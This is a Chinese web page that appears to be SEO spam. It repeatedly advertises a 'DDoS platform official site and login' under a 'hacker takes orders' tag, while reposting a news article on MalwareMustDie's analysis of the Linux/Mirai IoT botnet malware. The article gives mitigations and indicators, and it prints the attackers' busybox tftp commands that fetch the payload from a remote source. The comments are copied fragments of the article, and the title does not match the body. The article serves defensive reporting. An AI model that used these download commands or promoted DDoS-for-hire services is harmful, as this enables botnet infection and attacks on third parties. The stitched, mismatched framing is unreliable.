ddos平台官网(ddos平台 登陆)

ddos平台官网(ddos平台 登陆)

黑客接单hacker2024-03-27 4:20:22934A+A-

  

  9月7日讯 MalwareMustDie的专家发现了一款名为“ELF Linux/Mirai”的新型ELF木马后门,正针对物联网设备展

  MalwareMustDie专家八月分析了一个特殊的ELF木马后门样本—被称为ELF Linux/Mirai,目前该木马后门正针对物联网设备。这款恶意软件的名称与二进制“mirai.*”相同。据专家称,该恶意软件已发动数起攻击。

  VirusTotal在线扫描服务公司证实,ELF Linux/Mirai十分隐秘,许多杀毒解决方案仍无法检测到,检测率极低。

  MalwareMustDie博客中一份分析报告指出,“缺乏检测的原因在于缺乏样本,难以从受感染的物联网设备、路由器、DVR或WebIP摄像头和嵌入式平台中带有Busybox二进制的Linux中获取样本。”

  Security Affairs检测的最后一个EFL为Linux木马Linux.PNScan,这款木马活跃针对x86 Linux路由器,设法安装后门。

  但MalwareMustDie透露,Linux/Mirai比PnSan大得多。

ddos平台官网(ddos平台 登陆)

  分析指出,“这种威胁于8月初浮出水面,尽管这个ELF不易被检测,因为在安装后不会马上显示软件活动:只是静静待在这里,不会在系统中残留恶意软件,除了恶意软件运行的延迟过程外,所有文件均被删除。”

  这就意味着当感染成功,难以通过未受感染的系统区分受感染的系统,除了内存分析。我们讨论的是一类不易分析并调试的设备。起初,对文件系统或外部网络流量的普通分析无法提供任何证据。

ddos平台官网(ddos平台 登陆)

  物联网环境不利。物联网塑造着新一类强大的僵尸网络,扩散至全球。哪个国家更易遭受此类攻击?

  “具有Linux busybox嵌入式联网设备的国家,例如DVR或Web网络摄像头;以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标,尤其,未保护Telnet远程端口服务(Tcp/23)访问安全的设备或服务。”

  “Linux/Mirai开发人员成功编码字符串并将流量分流来伪装自己。”

  对于所有系统管理员最重要的是防御这类感染:与好朋友一起参与开放式过滤系统,安全工程师正努力推动—MalwareMustDie—正确的过滤签名提醒系统管理员是否遭受这类攻击威胁。在一个试点中,具有正确签名的系统管理员发现,仅仅几天内,攻击来源就有数百个地址。

  似乎感染在扩散,僵尸网络似乎非常广泛。

  这时,所有想要保护系统的系统管理员应当参看以下缓解措施:

  如果你具有物联网设备,请确保未打开telnet服务,该服务未运行。

  如果你未使用TCP/48101端口,请禁用,免于遭受感染和进一步损害。

  监控telnet连接,因为用户感染的僵尸网络协议为Telnet服务。

  逆向过程,寻找MalwareMustDie检测工具提示中报告的字符串。

  然而,我们确切地知道Linux/Mirai ELF恶意软件,但为什么恶意软件分析专家却不热衷分析这款恶意软件?

  MalwareMustDie表示,“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外,此款软件的真实样本难以获取,因为许多恶意软件分析专家必须在受感染的设备内存上提取,或者入侵CNC获取。”

  这就意味着,如果我们关掉受感染的设备,取证分析难上加难:所有信息会丢失,并且可能需要新的感染程序重新启动。

  之前的ELF恶意软件版本之间的最大不同点是什么?

  MalwareMustDie指出,“相比过去的类似威胁,攻击者目前具有不同策略—尽量潜伏(延缓)、不被检测(AV或流量过滤器中的低检测率)、不可见(未追踪,也没有样本提 取)、加密ELF的ASCII数据,保密分布。但很明显,攻击者的主要目的仍是DDoS僵尸网络,以通过他们所谓的Telnet扫描器快速将感染扩散至物 联网设备。”

  这款ELF真正隐秘地方在于,唯一的追踪途径是从运行的设备中提取内存。

  感染模式

  攻击者通过SSH或Telnet账号利用已知漏洞或使用默认密码入侵物联网设备。

  如果以现有设备的感染条件作为目标,这类ELF使用特定的技术分叉(fork)新的进程,否则节点即为安全,安装不会继续。

  

  一旦获取设备的外壳访问,攻击者将下载ELF Linux/Mirai恶意软件的有效荷载,下方为在物联网设备上执行操作的命令:

  ‘busybox tftp‘ -r [MalwareFile] -g [IPsource]

  ‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

  难以分析Linux/Mirai感染,原因在于一旦执行,恶意软件还能删除痕迹。

  MalwareMustDie 团队表示,“Linux/Mirai感染的某些情况表明,该恶意软件在没有参数的情况下执行;某些情况下,执行后会删除下载的恶意软件文件。这种情况下, 通常无法获取样本,除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”

  “一经执行,该恶意软件将自行删除,避免留下踪迹,但进程仍在运行。”在

  lsof中能看见的一些物联网设备或带有特定PID的/proc列表,也就是:

  /proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (删除)

  /proc/{PID}/exe -> ‘./{长字母字符串}’ alphabet (删除)

  进程运行的同时,恶意软件还打开PF_INET(TCP的UNIX网络套接字),并将它绑定到本地主机IP地址127.0.0.1的端口TCP/48101,之后开始侦听连入连接。这款恶意软件通过新进程PID分叉新进程。受感染的设备将在其它设备的Telnet服务上进行连接,进一步实 施滥用行为。

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 可难南简2024-03-27 07:36:30
  • 队表示,“Linux/Mirai感染的某些情况表明,该恶意软件在没有参数的情况下执行;某些情况下,执行后会删除下载的恶意软件文件。这种情况下, 通常无法获取样本,除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”   “一经执
  • 只影玖橘2024-03-27 15:44:50
  • 击?   “具有Linux busybox嵌入式联网设备的国家,例如DVR或Web网络摄像头;以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标,尤其,未保护Telnet远程端口服务(Tcp/23)访问安全的设备或服务。”   “Linux/
  • 怎忘拥醉2024-03-27 08:44:29
  • 软件?   MalwareMustDie表示,“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外,此款软件的真实样本难以获取,因为许多恶意软件分析专家必须在受感染的设备内存上提取,或者入侵CNC获取。”   这就意味着,

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理